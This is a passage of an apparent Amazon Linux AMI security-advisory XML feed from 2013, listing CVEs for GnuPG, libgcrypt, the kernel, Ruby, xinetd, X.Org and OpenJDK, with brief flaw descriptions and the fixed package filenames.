</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4242" title="" id="CVE-2013-4242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.14-1.20.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.14-1.20.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.14-1.20.amzn1.i686.rpm</filename></package><package name="gnupg" version="1.4.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.14-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-226</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-226: medium priority package update for libgcrypt</title><issued date="2013-09-19 15:49:00" /><updated date="2014-09-16 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4242:
GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x and possibly other products, allows local users to obtain private RSA keys via a cache side-channel attack involving the L3 cache, aka Flush+Reload.
988589:
CVE-2013-4242 GnuPG susceptible to Yarom/Falkner flush+reload cache side-channel attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4242" title="" id="CVE-2013-4242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-debuginfo" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.4.5" release="9.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.4.5-9.12.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.4.5-9.12.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.4.5-9.12.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.4.5" release="9.12.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.4.5-9.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-227</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-227: medium priority package update for nagios</title><issued date="2013-09-24 19:41:00" /><updated date="2014-09-16 21:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2029:
958015:
CVE-2013-2029 Nagios core: Insecure temporary file usage in nagios.upgrade_to_v3.sh
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2029" title="" id="CVE-2013-2029" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios-common" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios" version="3.5.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.5.1-1.6.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-devel-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.5.1-1.6.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.5.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.5.1-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-228</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-228: medium priority package update for kernel</title><issued date="2013-09-24 19:43:00" /><updated date="2014-09-16 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0343:
The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux kernel through 3.8 does not properly handle problems with the generation of IPv6 temporary addresses, which allows remote attackers to cause a denial of service (excessive retries and address-generation outage), and consequently obtain sensitive information, via ICMPv6 Router Advertisement (RA) messages.
914664:
CVE-2013-0343 kernel: handling of IPv6 temporary addresses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0343" title="" id="CVE-2013-0343" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.62-53.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.62" release="53.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.62-53.42.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.62" release="53.42.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.62-53.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-229</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-229: low priority package update for ruby19</title><issued date="2013-09-26 22:21:00" /><updated date="2014-09-16 21:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2065:
962035:
CVE-2013-2065 Ruby: Object taint bypassing in DL and Fiddle
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065" title="" id="CVE-2013-2065" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem19-rake" version="0.9.2.2" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-31.53.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.448-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-31.53.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-31.53.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.53.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="31.53.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-31.53.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.448-31.53.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.448-31.53.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-31.53.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.448" release="31.53.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.448-31.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-230</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-230: medium priority package update for rubygems</title><issued date="2013-09-26 22:22:00" /><updated date="2014-09-16 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4287:
1002364:
CVE-2013-4287 rubygems: version regex algorithmic complexity vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4287" title="" id="CVE-2013-4287" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems-devel" version="1.8.25" release="7.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.25-7.12.amzn1.noarch.rpm</filename></package><package name="rubygems" version="1.8.25" release="7.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.25-7.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-231</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-231: medium priority package update for rubygems</title><issued date="2013-10-16 20:52:00" /><updated date="2014-09-16 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4363:
1009720:
CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability, incomplete CVE-2013-4287 fix
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4363" title="" id="CVE-2013-4363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems" version="1.8.25" release="8.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.25-8.12.amzn1.noarch.rpm</filename></package><package name="rubygems-devel" version="1.8.25" release="8.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.25-8.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-232</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-232: medium priority package update for xinetd</title><issued date="2013-10-16 20:53:00" /><updated date="2014-09-16 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4342:
It was found that xinetd ignored the user and group configuration directives for services running under the tcpmux-server service. This flaw could cause the associated services to run as root. If there was a flaw in such a service, a remote attacker could use it to execute arbitrary code with the privileges of the root user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4342" title="" id="CVE-2013-4342" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1409.html" title="" id="RHSA-2013:1409" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xinetd-debuginfo" version="2.3.14" release="39.9.amzn1" epoch="2" arch="x86_64"><filename>Packages/xinetd-debuginfo-2.3.14-39.9.amzn1.x86_64.rpm</filename></package><package name="xinetd" version="2.3.14" release="39.9.amzn1" epoch="2" arch="x86_64"><filename>Packages/xinetd-2.3.14-39.9.amzn1.x86_64.rpm</filename></package><package name="xinetd" version="2.3.14" release="39.9.amzn1" epoch="2" arch="i686"><filename>Packages/xinetd-2.3.14-39.9.amzn1.i686.rpm</filename></package><package name="xinetd-debuginfo" version="2.3.14" release="39.9.amzn1" epoch="2" arch="i686"><filename>Packages/xinetd-debuginfo-2.3.14-39.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-233</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-233: medium priority package update for kernel</title><issued date="2013-10-16 20:53:00" /><updated date="2014-09-16 21:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4387:
net/ipv6/ip6_output.c in the Linux kernel through 3.11.4 does not properly determine the need for UDP Fragmentation Offload (UFO) processing of small packets after the UFO queueing of a large packet, which allows remote attackers to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via network traffic that triggers a large response packet.
1011927:
CVE-2013-4387 Kernel: net: IPv6: panic when UFO=On for an interface
CVE-2013-4299:
1004233:
CVE-2013-4299 kernel: dm: dm-snapshot data leak
* An information leak flaw was found in the way Linux kernel's device mapper subsystem, under certain conditions, interpreted data written to snapshot block devices. An attacker could use this flaw to read data from disk blocks in free space, which are normally inaccessible.
CVE-2013-4162:
The udp_v6_push_pending_frames function in net/ipv6/udp.c in the IPv6 implementation in the Linux kernel through 3.10.3 makes an incorrect function call for pending data, which allows local users to cause a denial of service (BUG and system crash) via a crafted application that uses the UDP_CORK option in a setsockopt system call.
987627:
CVE-2013-4162 Kernel: net: panic while pushing pending data out of a IPv6 socket with UDP_CORK enabled
* A flaw was found in the way the Linux kernel's TCP/IP protocol suite implementation handled IPv6 sockets that used the UDP_CORK option. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2013-2141:
The do_tkill function in kernel/signal.c in the Linux kernel before 3.8.9 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory via a crafted application that makes a (1) tkill or (2) tgkill system call.
970873:
CVE-2013-2141 Kernel: signal: information leak in tkill/tgkill
* An information leak flaw in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2012-4398:
The __request_module function in kernel/kmod.c in the Linux kernel before 3.4 does not set a certain killable attribute, which allows local users to cause a denial of service (memory consumption) via a crafted application.
853474:
CVE-2012-4398 kernel: request_module() OOM local DoS
* It was found that a deadlock could occur in the Out of Memory (OOM) killer. A process could trigger this deadlock by consuming a large amount of memory, and then causing request_module() to be called. A local, unprivileged user could use this flaw to cause a denial of service (excessive memory consumption).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4398" title="" id="CVE-2012-4398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2141" title="" id="CVE-2013-2141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4162" title="" id="CVE-2013-4162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4299" title="" id="CVE-2013-4299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4387" title="" id="CVE-2013-4387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.66-55.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.66" release="55.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.66-55.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.66" release="55.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.66-55.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-234</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-234: important priority package update for xorg-x11-server</title><issued date="2013-10-23 15:21:00" /><updated date="2014-09-16 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4396:
A use-after-free flaw was found in the way the X.Org server handled ImageText requests. A malicious, authorized client could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4396" title="" id="CVE-2013-4396" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1426.html" title="" id="RHSA-2013:1426" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xephyr" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="11.18.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-11.18.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="11.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-11.18.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-11.18.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="11.18.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-11.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-235</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-235: critical priority package update for java-1.7.0-openjdk</title><issued date="2013-10-23 15:22:00" /><updated date="2014-09-16 21:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5851:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5850:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5849:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5842:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5840:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5838:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5830:
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5829:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5825:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5823:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5820:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5817:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5814:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5809:
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.
CVE-2013-5804:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5803:
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit.
CVE-2013-5802:
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions.
CVE-2013-5800:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5797:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5790:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5784:
